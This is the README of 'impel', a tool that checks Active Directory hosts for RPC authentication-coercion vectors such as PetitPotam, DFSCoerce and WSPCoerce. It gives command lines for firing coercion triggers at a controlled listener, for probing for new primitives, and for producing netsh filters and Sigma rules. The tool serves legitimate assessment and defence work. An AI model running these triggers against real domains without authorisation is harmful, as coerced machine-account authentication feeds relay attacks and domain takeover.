Linux-native, impacket-based scanner for RPC authentication-coercion surface in Active Directory environments. Fingerprints which coercion-capable interfaces are reachable, fires triggers at a listener you control to confirm coercion, generates ready-to-deploy mitigations, and provides a research harness for hunting undiscovered primitives.
Scope. impel drives a machine account into authenticating to a listener you control and confirms it happened. It never relays. Relaying a coerced auth is
ntlmrelayx's job and is deliberately out of scope — that separation is what keeps impel a surface-assessment and research tool.The built-in connectback listener detects the inbound connection and fingerprints it as SMB or HTTP from the first 16 bytes, then drops the socket. It never completes NTLM negotiation and never reads or emits a hash. If you want the account name or a crackable hash, point the trigger at your own Responder with
validate --external.
pip install impacket rich
git clone https://github.com/cbev0x/impel
cd impelNo additional dependencies. wsp_packets.py bundles the WSP packet builders inline (adapted from RedTeam Pentesting's wspcoerce) so there are no external git dependencies.
Probes a nine-vector knowledge base across all candidate named pipes. Classifies each outcome as REACHABLE, denied, no-iface, or absent. The MS-WSP probe uses a raw SMB pipe open rather than a DCERPC bind since WSP is not a DCERPC protocol.
# Single host
python3 -m impel enum DC01.corp.lab -u user -p 'pass' -d corp.lab
# Subnet sweep
python3 -m impel enum 10.0.0.0/24 -u user -p 'pass' -d corp.lab
# Specific vectors only
python3 -m impel enum DC01.corp.lab --vector MS-DFSNM --vector MS-EVEN \
-u user -p 'pass' -d corp.lab
# JSON output for piping into defend
python3 -m impel enum DC01.corp.lab -u user -p 'pass' -d corp.lab --json \
> surface.json
# Pass the hash
python3 -m impel enum DC01.corp.lab -u user -H :<nthash> -d corp.lab
# Kerberos
python3 -m impel enum DC01.corp.lab -k --dc-ip 10.0.0.1 -d corp.labFires a coercion trigger at a listener you control and waits for the connectback. Eight triggers implemented across the known coercion corpus.
# Built-in listener on :445 (needs root)
sudo python3 -m impel validate DC01.corp.lab -L 10.10.10.50 \
-u user -p 'pass' -d corp.lab
# Specific vector
sudo python3 -m impel validate DC01.corp.lab -L 10.10.10.50 \
--vector MS-DFSNM -u user -p 'pass' -d corp.lab
# High port, no root needed
python3 -m impel validate DC01.corp.lab -L 10.10.10.50 \
--http --http-port 8080 --bind-port 8080 \
-u user -p 'pass' -d corp.lab
# External listener (Responder / ntlmrelayx); impel fires only
python3 -m impel validate DC01.corp.lab -L 10.10.10.50 --external \
-u user -p 'pass' -d corp.labTakes enum output (via --from-json) or runs enum internally. Produces a per-vector mitigation report, a ready-to-deploy netsh rpc filter script per host, and Sigma YAML rules for each detected vector family.
# Pipe enum JSON directly into defend
python3 -m impel enum DC01.corp.lab -u user -p 'pass' -d corp.lab --json | \
python3 -m impel defend --from-json - \
--netsh ./filters/ --sigma ./sigma/
# Run enum internally
python3 -m impel defend DC01.corp.lab -u user -p 'pass' -d corp.lab \
--netsh ./filters/ --sigma ./sigma/
# Apply generated filter on target (run on Windows)
# netsh -f DC01_corp_lab_rpc_filter.txtThe netsh scripts use layer=um actiontype=block per interface UUID and are applied with netsh -f <file>.txt. MS-WSP is excluded from netsh scripts intentionally — it is not DCERPC and has no UUID-based endpoint on the um layer; the correct mitigation is service disablement, which the tool documents in the per-vector output.
Sigma output covers three rule types per vector family: Sysmon 18 (named pipe connection), Sysmon 3 (outbound network connection from the coercing process), and Security 4624 (machine account network logon).
# Full EPM interface dump — cross-referenced against vector DB and KNOWN_UUIDS
python3 -m impel research dump DC01.corp.lab
# Heuristic candidate flagging (unknown UUIDs on named pipes score highest)
python3 -m impel research flag DC01.corp.lab --json
# Probe a candidate interface across an opnum range
# Fires each opnum with a UNC parameter and waits for connectback
sudo python3 -m impel research probe DC01.corp.lab \
--uuid <UUID> --pipe <pipe> --opnums 0-20 \
-L 10.10.10.50 -u user -p 'pass' -d corp.labpython3 -m impel vectors
| Vector | Family | Pipe | Coercion Method | Status on Server 2025 |
|---|---|---|---|---|
| MS-RPRN | PrinterBug | spoolss | RpcRemoteFindFirstPrinterChangeNotificationEx | Pipe gated by default |
| MS-PAR | PrinterBug (async) | spoolss | RpcAsyncOpenPrinter | Pipe gated by default |
| MS-EFSR | PetitPotam | lsarpc/efsrpc/samr/netlogon/lsass | EfsRpcOpenFileRaw | Patched — CVE-2021-36942, interface removed |
| MS-EFSR-alt | PetitPotam | efsrpc/lsarpc | EfsRpcOpenFileRaw | Patched — same |
| MS-DFSNM | DFSCoerce | netdfs | NetrDfsRemoveStdRoot | Live — no CVE, unpatched |
| MS-FSRVP | ShadowCoerce | FssagentRpc | IsPathShadowCopied | Patched — CVE-2022-30154 |
| MS-EVEN | EventLog coercion | eventlog | ElfrOpenBELW | Fires, no outbound auth |
| MS-EVEN6 | EventLog coercion v6 | eventlog | EvtRpcOpenLogHandle | Fires, no outbound auth |
| MS-WSP | WSPCoerce | MsFteWds | CPMCreateQueryIn | Live (admin, Windows Search enabled) |
Human output goes to stderr (rich terminal). --json output goes to stdout (clean, pipeable). Exit codes: 0 = surface found / coercion confirmed, 1 = nothing found, 2 = usage error.
Binding :445 for the SMB connectback listener requires root. Use --external, --http on a high port, or sudo as alternatives.
Validated against a fully patched Windows Server 2025 domain (build 26100). Two coercion primitives survive in the default configuration:
- MS-DFSNM (DFSCoerce) — confirmed coercing with domain user credentials. No CVE assigned, Microsoft has not patched authenticated coercion of this class.
- MS-WSP (WSPCoerce) — confirmed coercing with administrative credentials. Windows Search is disabled by default on Server 2025; the pipe ACL restricts access to admin accounts.
All other vectors are patched, gated by default, or blocked at the service level. The full analysis is in the accompanying writeup on cbev0x.github.io.
- Gilles Lionel (@topotam77) — PetitPotam / MS-EFSR
- Filip Dragovic (@Wh04m1001) — DFSCoerce / MS-DFSNM
- Lee Christensen and Elad Shamir — PrinterBug / MS-RPRN
- p0dalirius — Coercer and systematic coercion corpus research
- RedTeam Pentesting GmbH — wspcoerce, whose WSP packet builders are adapted in
wsp_packets.py - Impacket — RPC transport, NDR, and SMB layers throughout
MIT